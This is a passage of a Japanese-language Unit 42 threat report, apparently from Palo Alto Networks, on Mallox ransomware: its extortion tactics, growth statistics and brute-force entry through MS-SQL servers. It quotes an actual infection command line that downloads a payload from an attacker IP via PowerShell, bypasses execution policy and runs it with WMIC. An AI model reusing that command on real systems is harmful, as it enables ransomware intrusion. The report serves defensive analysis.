{"id":129319,"date":"2023-07-20T19:16:47","date_gmt":"2023-07-21T02:16:47","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=129319"},"modified":"2024-07-30T18:03:52","modified_gmt":"2024-07-31T01:03:52","slug":"mallox-ransomware","status":"publish","type":"post","link":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/mallox-ransomware\/","title":{"rendered":"\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306e\u8a55\u4fa1: Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2"},"content":{"rendered":"<h2><a id=\"post-129319-_zdjjbbl29xlf\"><\/a>\u6982\u8981<\/h2>\n<p>Mallox (\u5225\u540d TargetCompany\u3001FARGO\u3001Tohnichi) \u306f\u3001Microsoft Windows \u30b7\u30b9\u30c6\u30e0\u3092\u6a19\u7684\u3068\u3059\u308b\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2 \u30d5\u30a1\u30df\u30ea\u30fc\u3067\u3059\u3002\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306f 2021 \u5e74 6 \u6708\u304b\u3089\u6d3b\u52d5\u3057\u3066\u304a\u308a\u3001\u5b89\u5168\u3067\u306a\u3044 MS-SQL \u30b5\u30fc\u30d0\u30fc\u3092\u4fb5\u5165\u30d9\u30af\u30c8\u30eb\u3068\u3057\u3066\u60aa\u7528\u3057\u3001\u88ab\u5bb3\u8005\u306e\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u3092\u4fb5\u5bb3\u3059\u308b\u3053\u3068\u3067\u77e5\u3089\u308c\u307e\u3059\u3002<\/p>\n<p>Unit 42 \u306e\u30ea\u30b5\u30fc\u30c1\u30e3\u30fc\u306f\u6700\u8fd1\u3001MS-SQL \u30b5\u30fc\u30d0\u30fc\u3092\u60aa\u7528\u3057\u3066\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u3092\u914d\u5e03\u3059\u308b Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u5897\u52a0 (\u524d\u5e74\u6bd4\u3067\u307b\u307c 174%) \u3092\u89b3\u6e2c\u3057\u307e\u3057\u305f\u3002Unit 42 \u306e\u30a4\u30f3\u30b7\u30c7\u30f3\u30c8\u5bfe\u5fdc\u8005\u306f\u3001Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u304c\u30d6\u30eb\u30fc\u30c8 \u30d5\u30a9\u30fc\u30b9\u3001\u30c7\u30fc\u30bf\u6f0f\u51fa\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af \u30b9\u30ad\u30e3\u30ca\u30fc\u306a\u3069\u306e\u30c4\u30fc\u30eb\u3092\u4f7f\u3063\u3066\u3044\u308b\u3088\u3046\u3059\u3092\u89b3\u6e2c\u3057\u3066\u3044\u307e\u3059\u3002\u3055\u3089\u306b\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u306f\u30aa\u30da\u30ec\u30fc\u30b7\u30e7\u30f3\u306e\u62e1\u5927\u306b\u4e57\u308a\u51fa\u3057\u3066\u304a\u308a\u3001\u30cf\u30c3\u30ad\u30f3\u30b0 \u30d5\u30a9\u30fc\u30e9\u30e0\u3067\u30a2\u30d5\u30a3\u30ea\u30a8\u30a4\u30c8\u3092\u52df\u96c6\u3057\u3066\u3044\u308b\u3068\u3044\u3046\u30a4\u30f3\u30b8\u30b1\u30fc\u30bf\u30fc (\u6307\u6a19) \u3082\u78ba\u8a8d\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>\u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306e\u304a\u5ba2\u69d8\u306f\u3001<a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XDR\" target=\"_blank\" rel=\"noopener\">Cortex XDR<\/a>\u306e\u63d0\u4f9b\u3059\u308b Behavioral Threat Protection \u3084 Exploit Protection \u3092\u542b\u3080\u591a\u5c64\u9632\u5fa1\u3092\u901a\u3058\u3001\u672c\u7a3f\u3067\u53d6\u308a\u4e0a\u3052\u305f Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u304a\u3088\u3073\u305d\u306e\u6280\u8853\u304b\u3089\u306e\u4fdd\u8b77\u3092\u53d7\u3051\u3066\u3044\u307e\u3059\u3002<\/p>\n<div class=\"wp-video\" style=\"width: 1920px;\"><!-- [if lt IE 9]><script>document.createElement('video');<\/script><![endif]--><br \/>\n<video id=\"video-129318-1\" class=\"wp-video-shortcode\" preload=\"metadata\" controls=\"controls\" width=\"1920\" height=\"1080\"><source src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2023\/07\/mallox_video_prevent_detect_final.mp4?_=1\" type=\"video\/mp4\" \/><a href=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2023\/07\/mallox_video_prevent_detect_final.mp4\">https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2023\/07\/mallox_video_prevent_detect_final.mp4<\/a><\/video><\/div>\n<p style=\"text-align: center;\"><span style=\"color: #999999;\"><em><span style=\"font-size: 8pt;\">Cortex \u304c Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u5b9f\u884c\u3092\u963b\u6b62\u3059\u308b\u3088\u3046\u3059\u3092\u89e3\u8aac\u3057\u305f\u30d3\u30c7\u30aa<\/span><\/em><\/span><\/p>\n<p>\u30af\u30e9\u30a6\u30c9\u914d\u4fe1\u578b\u30de\u30eb\u30a6\u30a7\u30a2\u89e3\u6790\u30b5\u30fc\u30d3\u30b9 <a href=\"https:\/\/www.paloaltonetworks.jp\/products\/secure-the-network\/wildfire\" target=\"_blank\" rel=\"noopener\">Advanced WildFire<\/a> \u306f Mallox \u306b\u95a2\u9023\u3059\u308b\u30b5\u30f3\u30d7\u30eb\u3092\u300c\u60aa\u610f\u306e\u3042\u308b\u3082\u306e (malicious)\u300d\u3068\u3057\u3066\u6b63\u78ba\u306b\u8b58\u5225\u3057\u307e\u3059\u3002<a href=\"https:\/\/www.paloaltonetworks.jp\/network-security\/advanced-url-filtering\" target=\"_blank\" rel=\"noopener\">Advanced URL Filtering<\/a>\u3001<a href=\"https:\/\/www.paloaltonetworks.jp\/network-security\/dns-security\" target=\"_blank\" rel=\"noopener\">DNS Security<\/a>\u3092\u542b\u3080<a href=\"https:\/\/www.paloaltonetworks.jp\/network-security\/security-subscriptions\" target=\"_blank\" rel=\"noopener\">\u30af\u30e9\u30a6\u30c9\u914d\u4fe1\u578b\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30b5\u30fc\u30d3\u30b9<\/a>\u306f\u3001\u540c\u30b0\u30eb\u30fc\u30d7\u306b\u95a2\u9023\u3059\u308b\u30c9\u30e1\u30a4\u30f3\u3092\u300c\u60aa\u610f\u306e\u3042\u308b\u3082\u306e (malicious)\u300d\u3068\u3057\u3066\u8b58\u5225\u3057\u307e\u3059\u3002<\/p>\n<p>\u4fb5\u5bb3\u306e\u61f8\u5ff5\u304c\u3042\u308a\u5f0a\u793e\u306b\u30a4\u30f3\u30b7\u30c7\u30f3\u30c8\u30ec\u30b9\u30dd\u30f3\u30b9\u306b\u95a2\u3059\u308b\u3054\u76f8\u8ac7\u3092\u306a\u3055\u308a\u305f\u3044\u5834\u5408\u306f\u3001<a href=\"https:\/\/start.paloaltonetworks.jp\/contact-unit42.html\" target=\"_blank\" rel=\"noopener\">\u3053\u3061\u3089\u306e\u30d5\u30a9\u30fc\u30e0<\/a>\u304b\u3089\u304a\u554f\u3044\u5408\u308f\u305b\u304f\u3060\u3055\u3044 (\u3054\u76f8\u8ac7\u306f\u5f0a\u793e\u88fd\u54c1\u306e\u304a\u5ba2\u69d8\u306b\u306f\u9650\u5b9a\u3055\u308c\u307e\u305b\u3093)\u3002<\/p>\n<table style=\"width: 100%;\">\n<thead>\n<tr>\n<td style=\"width: 35%;\"><b>\u95a2\u9023\u3059\u308bUnit 42\u306e\u30c8\u30d4\u30c3\u30af<\/b><\/td>\n<td style=\"width: 100%;\"><a href=\"https:\/\/unit42.paloaltonetworks.jp\/category\/ransomware-ja\/\" target=\"_blank\" rel=\"noopener\"><b>Ransomware<\/b><\/a><\/td>\n<\/tr>\n<\/thead>\n<\/table>\n<h2><a id=\"post-129319-_95tjjly5lo5e\"><\/a>Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u6982\u8981<\/h2>\n<p>Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306f\u3001\u4ed6\u306e\u591a\u304f\u306e\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u8105\u5a01\u30a2\u30af\u30bf\u30fc\u3068\u540c\u69d8\u306b\u3001\u6d41\u884c\u308a\u306e<a href=\"https:\/\/www.paloaltonetworks.com\/cyberpedia\/what-is-multi-extortion-ransomware\" target=\"_blank\" rel=\"noopener\">\u4e8c\u91cd\u6050\u559d<\/a>\u3092\u884c\u3044\u307e\u3059\u3002\u7d44\u7e54\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u6697\u53f7\u5316\u3059\u308b\u524d\u306b\u30c7\u30fc\u30bf\u3092\u76d7\u307f\u3001\u300c\u76d7\u3093\u3060\u30c7\u30fc\u30bf\u3092\u30ea\u30fc\u30af\u30b5\u30a4\u30c8\u3067\u516c\u958b\u3059\u308b\u300d\u3068\u8105\u3059\u3053\u3068\u3067\u3001\u88ab\u5bb3\u8005\u306b\u8eab\u4ee3\u91d1\u3092\u652f\u6255\u308f\u305b\u3088\u3046\u3068\u3057\u307e\u3059\u3002<\/p>\n<p>\u4e0b\u306e\u56f3 1 \u306f\u3001Tor \u30d6\u30e9\u30a6\u30b6\u30fc\u4e0a\u306e Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2 Web \u30b5\u30a4\u30c8\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u7d44\u7e54\u306e\u540d\u524d\u3068\u30ed\u30b4\u306f\u4f0f\u305b\u3066\u3042\u308a\u307e\u3059\u304c\u3001\u3053\u306e\u30b0\u30eb\u30fc\u30d7\u306f\u3053\u3046\u3044\u3046\u3084\u308a\u304b\u305f\u3067\u6a19\u7684\u304b\u3089\u6f0f\u3048\u3044\u3057\u305f\u30c7\u30fc\u30bf\u3092\u8868\u793a\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_129267\" aria-describedby=\"caption-attachment-129267\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-129267 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2023\/07\/word-image-129264-1.png\" alt=\"\u753b\u50cf 1 \u306f\u3001Tor \u30d6\u30e9\u30a6\u30b6\u30fc\u4e0a\u306e Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2 \u30ae\u30e3\u30f3\u30b0 Web \u30b5\u30a4\u30c8\u306e\u30b7\u30e7\u30c3\u30c8\u3067\u3059\u3002\u3053\u306e Web \u30b5\u30a4\u30c8\u306e\u30bf\u30a4\u30c8\u30eb\u306f Mallox Data Leaks \u3067\u3059\u3002\u3053\u3053\u3067\u306f 6 \u3064\u306e\u30b5\u30e0\u30cd\u30a4\u30eb (\u30e2\u30b6\u30a4\u30af\u51e6\u7406\u6e08\u307f) \u3092\u8868\u793a\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u3089\u306f\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2 \u30ae\u30e3\u30f3\u30b0\u304c\u6295\u7a3f\u3057\u305f\u88ab\u5bb3\u8005\u3067\u3059\u3002\" width=\"900\" height=\"481\" \/><figcaption id=\"caption-attachment-129267\" class=\"wp-caption-text\">\u56f31. Tor \u30d6\u30e9\u30a6\u30b6\u30fc\u4e0a\u306e Mallox Web \u30b5\u30a4\u30c8<\/figcaption><\/figure>\n<p>\u5404\u88ab\u5bb3\u8005\u306b\u306f\u79d8\u5bc6\u9375\u304c\u4e0e\u3048\u3089\u308c\u3001\u3053\u306e\u79d8\u5bc6\u9375\u3092\u4f7f\u3063\u3066\u540c\u30b0\u30eb\u30fc\u30d7\u3068\u306e\u5bfe\u8a71\u3084\u6761\u4ef6\u3084\u652f\u6255\u3044\u306e\u4ea4\u6e09\u3092\u884c\u3044\u307e\u3059\u3002\u4ee5\u4e0b\u306e\u56f3 2 \u306f\u540c\u30b0\u30eb\u30fc\u30d7\u3068\u306e\u901a\u4fe1\u306b\u4f7f\u308f\u308c\u308b\u30c1\u30e3\u30c3\u30c8\u3067\u3059\u3002<\/p>\n<figure id=\"attachment_129269\" aria-describedby=\"caption-attachment-129269\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-129269 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2023\/07\/word-image-129264-2.png\" alt=\"\u753b\u50cf 2 \u306f\u3001Tor \u4e0a\u306e Web \u30b5\u30a4\u30c8\u4e0a\u306e Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2 \u30ae\u30e3\u30f3\u30b0\u306e\u30d7\u30e9\u30a4\u30d9\u30fc\u30c8 \u30c1\u30e3\u30c3\u30c8\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u3067\u3059\u3002\u30c1\u30e3\u30c3\u30c8 \u30a6\u30a3\u30f3\u30c9\u30a6\u3001\u9867\u5ba2\u60c5\u5831\u30a6\u30a3\u30f3\u30c9\u30a6\u3001\u652f\u6255\u3044\u306e\u8a73\u7d30\u3001\u30aa\u30f3\u30e9\u30a4\u30f3 \u30b9\u30bf\u30c3\u30d5\u306e\u30ea\u30b9\u30c8\u304c\u3042\u308a\u307e\u3059\u3002\u4f1a\u8a71\u306f\u30b5\u30dd\u30fc\u30c8\u3068\u540d\u524d\u3092\u3075\u305b\u305f\u8ab0\u304b\u3068\u306e\u9593\u3067\u884c\u308f\u308c\u3066\u3044\u307e\u3059\u3002\u30d5\u30a1\u30a4\u30eb\u304c\u9001\u4fe1\u3055\u308c\u3001Mallox \u306e\u30e1\u30f3\u30d0\u30fc\u304c\u4fa1\u683c\u306b\u3064\u3044\u3066\u8a71\u3057\u5408\u3046\u3053\u3068\u304c\u3067\u304d\u308b\u3068\u8a00\u3044\u3001\u540d\u524d\u3092\u3075\u305b\u305f\u76f8\u624b\u304b\u3089\u4fa1\u683c\u304c\u6c7a\u307e\u3063\u3066\u3044\u308b\u304b\u3069\u3046\u304b\u3092\u5c0b\u306d\u308b\u8fd4\u4fe1\u304c\u3042\u308a\u307e\u3059\u3002\u3053\u3053\u3067\u793a\u3055\u308c\u3066\u3044\u308b\u4f1a\u8a71\u306f\u3053\u308c\u3067\u7d42\u4e86\u3057\u3066\u3044\u307e\u3059\u3002\" width=\"900\" height=\"600\" \/><figcaption id=\"caption-attachment-129269\" class=\"wp-caption-text\">\u56f32. Mallox \u306e\u30d7\u30e9\u30a4\u30d9\u30fc\u30c8\u30c1\u30e3\u30c3\u30c8\u7528\u306e Tor \u30b5\u30a4\u30c8<\/figcaption><\/figure>\n<p>Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2 \u30b0\u30eb\u30fc\u30d7\u306f\u88ab\u5bb3\u8005\u304c\u4f55\u767e\u4eba\u3082\u3044\u308b\u3068<a href=\"https:\/\/www.suspectfile.com\/interview-with-mallox-ransomware-group\/\" target=\"_blank\" rel=\"noopener\">\u4e3b\u5f35<\/a>\u3057\u3066\u3044\u307e\u3059\u3002\u5b9f\u969b\u306e\u88ab\u5bb3\u8005\u306e\u6570\u306f\u308f\u304b\u3089\u306a\u3044\u307e\u307e\u3067\u3059\u304c\u3001\u5f0a\u793e\u306e\u30c6\u30ec\u30e1\u30c8\u30ea\u30fc\u306f\u3001\u88fd\u9020\u3001\u5c02\u9580\u30b5\u30fc\u30d3\u30b9\u304a\u3088\u3073\u6cd5\u5f8b\u30b5\u30fc\u30d3\u30b9\u3001\u5378\u58f2\u304a\u3088\u3073\u5c0f\u58f2\u3092\u542b\u3080\u8907\u6570\u306e\u696d\u754c\u3092\u307e\u305f\u304e\u3001\u4e16\u754c\u4e2d\u3067\u6570\u5341\u4eba\u306e\u6f5c\u5728\u7684\u88ab\u5bb3\u8005\u304c\u3044\u308b\u3053\u3068\u3092\u793a\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<p>2023 \u5e74\u306e\u521d\u3081\u4ee5\u6765\u3001Mallox \u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u306f\u5b89\u5b9a\u7684\u306b\u5897\u52a0\u3057\u3066\u3044\u307e\u3059\u3002\u5f0a\u793e\u306e\u30c6\u30ec\u30e1\u30c8\u30ea\u30fc\u3068\u30aa\u30fc\u30d7\u30f3\u8105\u5a01\u60c5\u5831\u6e90\u304b\u3089\u53ce\u96c6\u3057\u305f\u30c7\u30fc\u30bf\u306b\u3088\u308b\u3068\u30012023 \u5e74\u306b\u306f\u30012022 \u5e74\u5f8c\u534a\u3068\u6bd4\u8f03\u3057\u3066 Mallox \u306e\u653b\u6483\u304c\u7d04 174% \u5897\u52a0\u3057\u3066\u3044\u307e\u3057\u305f (\u56f3 3 \u53c2\u7167)\u3002<\/p>\n<figure id=\"attachment_129271\" aria-describedby=\"caption-attachment-129271\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-129271 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2023\/07\/word-image-129264-3.png\" alt=\"\u753b\u50cf 3 \u306f\u30012023 \u5e74 1 \u6708\u304b\u3089 2023 \u5e74 6 \u6708\u307e\u3067\u306e Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u653b\u6483\u8a66\u884c\u306e\u5897\u52a0\u3092\u793a\u3059\u30b0\u30e9\u30d5\u3067\u3059\u3002\" width=\"900\" height=\"497\" \/><figcaption id=\"caption-attachment-129271\" class=\"wp-caption-text\">\u56f33. \u30d1\u30ed\u30a2\u30eb\u30c8\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30b9\u306e\u30c6\u30ec\u30e1\u30c8\u30ea\u30fc\u306b\u57fa\u3065\u304f Mallox \u306e\u653b\u6483\u8a66\u884c\u6570\u306e\u63a8\u79fb (2022 \u5e74\u5f8c\u534a \u301c 2023 \u5e74\u524d\u534a)<\/figcaption><\/figure>\n<h2><a id=\"post-129319-_sohi76muwlzm\"><\/a>\u521d\u671f\u30a2\u30af\u30bb\u30b9<\/h2>\n<p>2021 \u5e74\u306e\u51fa\u73fe\u4ee5\u6765\u3001Mallox \u30b0\u30eb\u30fc\u30d7\u306f\u305a\u3063\u3068\u540c\u3058\u65b9\u6cd5\u3067\u521d\u671f\u30a2\u30af\u30bb\u30b9\u3092\u53d6\u5f97\u3057\u3066\u3044\u307e\u3059\u3002\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u3067\u4fdd\u8b77\u3055\u308c\u3066\u3044\u306a\u3044 MS-SQL \u30b5\u30fc\u30d0\u30fc\u3092\u72d9\u3044\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u306b\u4fb5\u5165\u3059\u308b\u3068\u3044\u3046\u65b9\u6cd5\u3067\u3059\u3002\u653b\u6483\u306f\u8f9e\u66f8\u306e\u30d6\u30eb\u30fc\u30c8 \u30d5\u30a9\u30fc\u30b9\u653b\u6483\u304b\u3089\u59cb\u307e\u308a\u3001MS-SQL \u30b5\u30fc\u30d0\u30fc\u306b\u65e2\u77e5\u306e\u30d1\u30b9\u30ef\u30fc\u30c9\u3084\u3088\u304f\u4f7f\u308f\u308c\u3066\u3044\u308b\u30d1\u30b9\u30ef\u30fc\u30c9\u306e\u30ea\u30b9\u30c8\u3092\u8a66\u3057\u307e\u3059\u3002\u30a2\u30af\u30bb\u30b9\u53d6\u5f97\u5f8c\u306f\u3001\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3\u3068 PowerShell \u3092\u4f7f\u3063\u3066\u30ea\u30e2\u30fc\u30c8 \u30b5\u30fc\u30d0\u30fc\u304b\u3089 Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u307e\u3059 (\u56f3 4 \u53c2\u7167)\u3002<\/p>\n<figure id=\"attachment_129273\" aria-describedby=\"caption-attachment-129273\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-129273 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2023\/07\/word-image-129264-4.png\" alt=\"\u753b\u50cf 4 \u306f\u3001Cortex XDR \u3068 Cortex XSIAM \u306e\u30a2\u30e9\u30fc\u30c8\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u3067\u3059\u3002Alert Name (\u30a2\u30e9\u30fc\u30c8\u540d) \u306f\u300cPossible Brute-Force Attempt. (\u30d6\u30eb\u30fc\u30c8 \u30d5\u30a9\u30fc\u30b9\u653b\u6483\u306e\u7591\u3044)\u300d\u3067\u3001Description (\u8aac\u660e) \u306b\u306f\u3001\u300cA user account attempted to authenticate to a target an excessive number of times in a short period. (\u3042\u308b\u30e6\u30fc\u30b6\u30fc \u30a2\u30ab\u30a6\u30f3\u30c8\u304c\u6a19\u7684\u3078\u306e\u8a8d\u8a3c\u3092\u77ed\u671f\u9593\u306b\u904e\u5270\u306b\u8a66\u307f\u307e\u3057\u305f\u3002)This may indicate a brute force attack. (\u3053\u308c\u306f\u30d6\u30eb\u30fc\u30c8 \u30d5\u30a9\u30fc\u30b9\u653b\u6483\u3092\u793a\u5506\u3059\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002)\u300d\u3068\u8a18\u8f09\u3055\u308c\u3066\u3044\u307e\u3059\u3002\" width=\"900\" height=\"81\" \/><figcaption id=\"caption-attachment-129273\" class=\"wp-caption-text\">\u56f34. Cortex XDR \/ XSIAM \u304c Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306b\u3088\u308b\u8f9e\u66f8\u578b\u30d6\u30eb\u30fc\u30c8 \u30d5\u30a9\u30fc\u30b9\u653b\u6483\u306b\u53cd\u5fdc\u3057\u3066\u751f\u6210\u3057\u305f\u30a2\u30e9\u30fc\u30c8\u306e\u4f8b<\/figcaption><\/figure>\n<p>Mallox \u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u304c\u611f\u67d3\u306b\u4f7f\u3046\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3\u306e\u4f8b\u306f\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u3082\u306e\u3067\u3059\u3002<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta --><\/p>\n<pre class=\"lang:default decode:true\">\"\\\"C:\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\" \/C echo $cl = New-Object System.Net.WebClient &gt; C:\\Users\\MSSQLS~1\\AppData\\Local\\Temp\\updt.ps1 &amp; echo $cl.DownloadFile(\\\"hxxp:\/\/80.66.75[.]36\/aRX.exe\\\", \\\"C:\\Users\\MSSQLS~1\\AppData\\Local\\Temp\\tzt.exe\\\") &gt;&gt; %TEMP%\\\\updt.ps1 &amp; powershell -ExecutionPolicy Bypass C:\\Users\\MSSQLS~1\\AppData\\Local\\Temp\\updt.ps1 &amp; WMIC process call create \\\"C:\\Users\\MSSQLS~1\\AppData\\Local\\Temp\\tzt.exe\\\"\"<\/pre>\n<p><!-- [Format Time: 0.0003 seconds] --><\/p>\n<p>\u3053\u306e\u30b3\u30de\u30f3\u30c9\u30e9\u30a4\u30f3\u306f\u6b21\u306e\u3053\u3068\u3092\u884c\u3044\u307e\u3059\u3002<\/p>\n<ul>\n<li>\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3092 <span style=\"font-family: 'courier new', courier, monospace;\">hxxp:\/\/80.66.75[.]36\/aRX.exe<\/span> \u304b\u3089\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3066 <span style=\"font-family: 'courier new', courier, monospace;\">tzt.exe<\/span> \u3068\u3057\u3066\u4fdd\u5b58\u3059\u308b<\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">updt.ps1<\/span> \u3068\u3044\u3046\u540d\u524d\u306e PowerShell \u30b9\u30af\u30ea\u30d7\u30c8\u3092\u5b9f\u884c\u3059\u308b<\/li>\n<\/ul>\n<p>\u305d\u306e\u5f8c\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u6b21\u306e\u51e6\u7406\u3092\u5b9f\u884c\u3057\u307e\u3059 (\u4e0a\u8a18\u306e\u30b3\u30de\u30f3\u30c9 \u30e9\u30a4\u30f3 \u30b9\u30af\u30ea\u30d7\u30c8\u306b\u306f\u793a\u3055\u308c\u3066\u3044\u307e\u305b\u3093)\u3002<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">system.bat<\/span> \u3068\u3044\u3046\u540d\u524d\u306e\u5225\u306e\u30d5\u30a1\u30a4\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3001\u3053\u308c\u3092 <span style=\"font-family: 'courier new', courier, monospace;\">tzt.bat<\/span> \u3068\u3057\u3066\u4fdd\u5b58\u3059\u308b<\/li>\n<li>\u3053\u306e <span style=\"font-family: 'courier new', courier, monospace;\">tzt.bat<\/span> \u3068\u3044\u3046\u30d5\u30a1\u30a4\u30eb\u3092\u4f7f\u3063\u3066 <span style=\"font-family: 'courier new', courier, monospace;\">SystemHelp<\/span> \u3068\u3044\u3046\u30e6\u30fc\u30b6\u30fc\u3092\u4f5c\u6210\u3057\u3001\u30ea\u30e2\u30fc\u30c8 \u30c7\u30b9\u30af\u30c8\u30c3\u30d7 \u30d7\u30ed\u30c8\u30b3\u30eb (RDP) \u3092\u6709\u52b9\u306b\u3059\u308b<\/li>\n<li>Windows Management Instrumentation (WMI) \u3092\u4f7f\u3063\u3066\u30e9\u30f3\u30b5\u30e0\u30a6\u30a7\u30a2\u306e\u30da\u30a4\u30ed\u30fc\u30c9 <span style=\"font-family: 'courier new', courier, monospace;\">tzt.exe<\/span> \u3092\u5b9f\u884c\u3059\u308b<\/li>\n<\/ul>\n<p>\u4ee5\u4e0b\u306e\u56f3 5 \u306f\u3001SQL \u30b5\u30fc\u30d0\u30fc\u3092\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3059\u308b\u7b2c 1 \u6bb5\u968e\u306e\u30b9\u30c6\u30c3\u30d7\u306e 1 \u3064\u3092\u524d\u8ff0\u306e Cortex XDR \/ XSIAM \u304c\u3069\u306e\u3088\u3046\u306b\u691c\u51fa\u3057\u305f\u306e\u304b\u3092\u793a\u3059\u3082\u306e\u3067\u3059\u3002<\/p>\n<figure id=\"attachment_129275\" aria-describedby=\"caption-attachment-129275\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-129275 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2023\/07\/word-image-129264-5.png\" alt=\"\u753b\u50cf 5 \u306f\u3001Cortex XDR \/ XSIAM \u306b\u3088\u308b SQL \u30b5\u30fc\u30d0\u30fc\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30d7\u30ed\u30bb\u30b9 \u30c4\u30ea\u30fc\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u3067\u3059\u3002\u3053\u3053\u306b\u306f\u300cUncommon user management via net.EXE. (net.EXE \u306b\u3088\u308b\u901a\u5e38\u3068\u7570\u306a\u308b\u30e6\u30fc\u30b6\u30fc\u7ba1\u7406)\u300d\u3068\u3044\u3046\u30a2\u30e9\u30fc\u30c8\u540d\u304c\u8868\u793a\u3055\u308c\u3066\u3044\u307e\u3059\u3002\" width=\"900\" height=\"254\" \/><figcaption id=\"caption-attachment-129275\" class=\"wp-caption-text\">\u56f35. Cortex XDR \/ XSIAM \u3067 SQL \u30b5\u30fc\u30d0\u30fc\u306e\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8 \u30d7\u30ed\u30bb\u30b9 \u30c4\u30ea\u30fc\u3092\u8868\u793a\u3057\u305f\u3068\u3053\u308d\u3002\u3053\u3053\u3067\u306f\u691c\u8a3c\u306e\u305f\u3081\u300c\u691c\u51fa\u306e\u307f\u300d\u306e\u30e2\u30fc\u30c9\u306b\u8a2d\u5b9a\u3057\u3066\u3042\u308b<\/figcaption><\/figure>\n<h2><a 